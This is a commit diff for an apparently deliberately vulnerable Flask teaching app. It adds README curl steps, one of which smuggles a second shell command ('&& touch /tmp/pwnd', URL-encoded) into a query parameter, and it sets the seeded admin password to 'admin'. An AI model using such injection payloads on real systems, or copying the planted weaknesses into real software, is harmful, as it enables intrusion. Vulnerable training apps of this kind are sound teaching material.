Add minimal instruction on how to test (#15)

Author: ursachec

README.md

@@ -55,3 +55,11 @@ $ grep vulnerability . -R -n | grep -v README
 ./run.py:7: # vulnerability: Broken Access Control
 ./run.py:9: # vulnerability: Security Misconfiguration
 ```
+
+### How to test
+
+```
+$ curl -b cookie.txt -d'username=admin&password=admin' localhost:5000/login
+$ curl -c cookie.txt localhost:5000/grep_processes?name=kworker
+$ curl -c cookie.txt "localhost:5000/grep_processes?name=xxx%20%26%26%20touch%20%2Ftmp%2Fpwnd"
+```

flask_webgoat/__init__.py

@@ -31,7 +31,7 @@ def create_app():
  conn.execute(create_table_query)
 
  insert_admin_query = """INSERT INTO user (id, username, password, access_level)
- VALUES (1, 'admin', 'maximumentropy', 0)"""
+ VALUES (1, 'admin', 'admin', 0)"""
  conn.execute(insert_admin_query)
  conn.commit()
  conn.close()